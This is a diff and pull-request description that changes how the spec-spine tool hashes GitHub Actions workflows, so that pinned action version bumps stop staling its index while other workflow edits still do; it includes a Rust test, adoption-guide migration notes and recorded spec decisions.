+        "---\nid: \"001-a\"\ntitle: \"A\"\nstatus: approved\ncreated: \"2026-06-09\"\n\
+         summary: \"s\"\nestablishes:\n  - \".github/workflows/ci.yml\"\n---\n# 001-a\n## body\n",
+    );
+    write(root, ".github/workflows/ci.yml", WF);
+
+    let cfg =
+        spec_spine_types::load_config(&fs::read_to_string(root.join("spec-spine.toml")).unwrap())
+            .unwrap();
+    let before = shard::global_inputs_hash(&cfg, root);
+
+    write(
+        root,
+        ".github/workflows/ci.yml",
+        &WF.replace("checkout@v4", "checkout@v5"),
+    );
+    assert_eq!(
+        before,
+        shard::global_inputs_hash(&cfg, root),
+        "a `uses:` bump must leave the scalar every shard hash folds"
+    );
+
+    write(
+        root,
+        ".github/workflows/ci.yml",
+        &WF.replace("cargo test", "cargo bench"),
+    );
+    assert_ne!(
+        before,
+        shard::global_inputs_hash(&cfg, root),
+        "a `run:` edit is a governed change and must still stale the ledger"
+    );
+}

--- a/docs/adoption-guide.md
+++ b/docs/adoption-guide.md
@@ -343,6 +343,23 @@ the other is how a governance file ends up outside both.
 > Commit the result. Nothing about what staleness *means* has changed; a surface
 > that was silently outside the ledger is now inside it.
 
+> **Upgrading across spec 073.** A GitHub Actions workflow now folds into the
+> content hash as its **governance projection**: the parsed document with the
+> pinned ref of every `uses:` reference removed and the action path kept. A
+> Dependabot action bump therefore stales nothing, while a changed action, an
+> unpin, a `run:` / `with:` / `env:` / `if:` edit, an added step and a changed
+> trigger all still do. If you hash your workflows, your next `spec-spine
+> index` rewrites every shard once, exactly as the npm and cargo projections
+> did before it. Commit the result. No schema version changes: only a hash
+> value moves.
+>
+> If you seal your ledger (spec 023), a **corpus attestation created before
+> this change** was computed over hashes from the previous rule. Re-attest
+> after re-indexing. `verify-attestation --recompute` compares the tool version
+> before it compares content, so a pre-073 attestation reports
+> `VersionMismatch` with the remedy in the message, never a content mismatch:
+> this reads as an upgrade, not as tampering.
+
 ## Directory units claim recursively
 
 A `file` unit with a **trailing slash** is a subtree claim:

--- a/specs/073-a-workflow-bump-is-not-a-governed-change/spec.md
+++ b/specs/073-a-workflow-bump-is-not-a-governed-change/spec.md
@@ -4,7 +4,7 @@ title: "A workflow bump is not a governed change"
 status: draft
 kind: "tooling"
 created: "2026-09-08"
-implementation: in-progress
+implementation: complete
 owner: "The spec-spine Authors"
 risk: high
 depends_on:

--- a/specs/073-a-workflow-bump-is-not-a-governed-change/spec.md
+++ b/specs/073-a-workflow-bump-is-not-a-governed-change/spec.md
@@ -4,7 +4,7 @@ title: "A workflow bump is not a governed change"
 status: draft
 kind: "tooling"
 created: "2026-09-08"
-implementation: pending
+implementation: in-progress
 owner: "The spec-spine Authors"
 risk: high
 depends_on:
@@ -34,6 +34,10 @@ extends:
   - { spec: "030-cargo-workflow-dependency-waiver", unit: "crates/spec-spine-cli/tests/couple.rs", nature: additive }
   # 3.5 the freshness guard.
   - { spec: "004-codebase-index", unit: "crates/spec-spine-core/tests/index.rs", nature: additive }
+  # 3.3 the migration note, beside spec 069's in the same document. Declared in
+  # the implementing change: 3.3 mandates a note and names no file, and the 069
+  # precedent puts it here.
+  - { spec: "067-the-docs-name-what-adopters-derived", unit: "docs/adoption-guide.md", nature: additive }
 references:
   - { unit: { kind: file, path: "docs/design/00-architecture.md" }, role: context }
   - { unit: { kind: file, path: "docs/schema-versioning.md" }, role: context }
@@ -316,6 +320,41 @@ changes it. The 069 edge is the less obvious of the two and is the reason the
 frontmatter carries a comment: 069 3.6 does not merely observe that a bump
 stales the index, it requires the test to assert it, so making the bump
 harmless contradicts a requirement rather than correcting an implementation.
+
+**2026-09-08: a pinned reference projects to `owner/action@`, keeping the `@`
+as a marker.** Section 3.1 words the rule as "`owner/action@<ref>` projects to
+`owner/action`", and taken literally that collides with the same section's next
+rule, which preserves an unpinned `uses:` verbatim: `a/b@v4` and `a/b` would
+both fold to `a/b`, so **unpinning an action would be invisible to the ledger**.
+Section 3.5 requires the opposite ("An action unpinned (`@v4` removed): hash
+changes"), and so do the summary and 3.1's own justification that "unpinning is
+a change to the security posture, not a version bump". Keeping the `@` is the
+reading that satisfies all three: the ref is removed, the path is preserved, and
+the two spellings stay distinct. Recorded rather than silently chosen, because
+3.1's literal wording is the one an implementer reads first.
+
+**2026-09-08: an empty action path is preserved verbatim, which is what makes
+3.2 hold in both directions.** `dep_only::uses_ref_only_differs` refuses the
+waiver when the text before `@` is empty, so a projection that stripped `@v1`
+to `@` would leave the hash unchanged on a change the waiver refuses. Mirroring
+the guard turns 3.2's required implication (waived implies unchanged) into a
+biconditional, which is the stronger assertion and the one that would actually
+catch the two rules drifting apart. The matrix asserts it in both directions.
+
+**2026-09-08: the migration note lands in `docs/adoption-guide.md`, and the
+edge for it was declared here.** Section 3.3 requires the note and names no
+file. Spec 069's note is in that document, the two address the same reader, and
+splitting them would leave an adopter reading one without the other. The
+`extends` edge on 067's unit is declared in this change rather than in the
+draft, which is the ownership claim arriving with the work that needs it.
+
+**2026-09-08: sequenced by building serially, which is 3.3's first safe
+order.** Section 3.3 requires the restale to be sequenced deliberately and
+offers two safe orders. The first was taken: this change landed with no other
+implementation branch outstanding, spec 072 having merged before this branch
+was cut. The second order (land first, rebase everything else) was not needed,
+and the silent failure 3.3 warns about, two branches writing disjoint shards
+under different rules with no textual conflict, cannot arise.
 
 ## Verification
 


### PR DESCRIPTION
Implements spec 073. Closes the half-built mechanism where the coupling gate
forgives a Dependabot action bump and the ledger does not.

## The wall

Every shard hash folds a **global-inputs scalar** covering `spec-spine.toml` and
every `[index] extra_hashed_inputs` match. Those matches entered as raw bytes,
and `.github/workflows/**/*` is half the shipped default, so a one-character
change to a pinned action ref moved the scalar, and the scalar is in every
shard: **every shard in the repository went stale at once.**

The PR that triggers it cannot repair itself. Dependabot has no toolchain to run
`spec-spine index`, no write path to commit regenerated shards, and no way to
put a `Spec-Drift-Waiver:` line in a body it does not author. So `index check`
exited 2 and the PR waited for a human to push a purely mechanical re-hash.

## The projection (3.1)

A workflow now folds as its **governance projection**: the parsed document with
the pinned ref of every `uses:` reference removed and the action path kept,
rendered through the same canonical sorted-key serializer the npm and cargo
projections use. Unparseable or non-mapping falls back to raw bytes, the
fail-closed direction those two already take.

**Only the ref is stripped, never the action path.** Dropping the whole `uses:`
value would make swapping `actions/checkout` for a fork invisible to the ledger.

**The `@` is kept as a marker.** Spec 073 3.1 words the rule as projecting to
`owner/action`, which taken literally collides with the same section's rule that
an unpinned `uses:` is preserved verbatim: `a/b@v4` and `a/b` would fold
together and **unpinning would be invisible**. Section 3.5, the summary, and
3.1's own justification all require the opposite. Keeping the `@` satisfies all
three, and is recorded as a decision in the spec.

## Agreement with 030's waiver (3.2)

Asserted over a shared matrix, and in **both** directions rather than the one
implication 3.2 requires. The empty-action-path form (`@v1`) is preserved
verbatim precisely because `dep_only::uses_ref_only_differs` refuses it, so the
two rules agree case for case and a drift between them would fail the matrix.

## Evidence

- The projection matrix: tag bump, SHA-pin bump and subpath bump leave the hash
  alone; changed action path, unpin, `run:` / `with:` / `env:` / `if:` edit,
  added step, added job, changed trigger, changed runner and changed local
  action all move it; comment-only and reformat-only leave it alone;
  unparseable falls back.
- 3.4: the auto-waive test now asserts the bump leaves the index **fresh** with
  no re-index in between, and a companion asserts a `run:` edit stales it and
  refuses the waiver. Against pre-073 code the corrected assertion fails with
  `index is STALE`, which is the wall itself.
- End to end on this repository's own corpus: a `uses:` bump leaves `index
  check` at exit 0; a `run:` edit in the same file exits 2.

Gate green: lint 0 warnings, coverage 79/79, couple 7 paths no drift, `verify
073` passes all 7 commands, workspace tests, clippy and fmt clean.

## Migration

The one-time restale: **82 shards** regenerated and committed here. No schema
version changes; only a hash value moves. `docs/adoption-guide.md` gains the
note beside spec 069's, including the spec 023 consequence: a pre-073
attestation reports `VersionMismatch` with the remedy in the message, never a
content mismatch, so it reads as an upgrade rather than as tampering.

Sequenced per 3.3 by the first of its two safe orders: this landed with no other
implementation branch outstanding, spec 072 having merged before this branch was
cut.

## Edges

`amends` 004 (the content-hash definition names its projections, and this adds a
third, following the precedent 030 set for cargo) and `amends` 069 (whose 3.6
required the test to assert that a bump stales the index).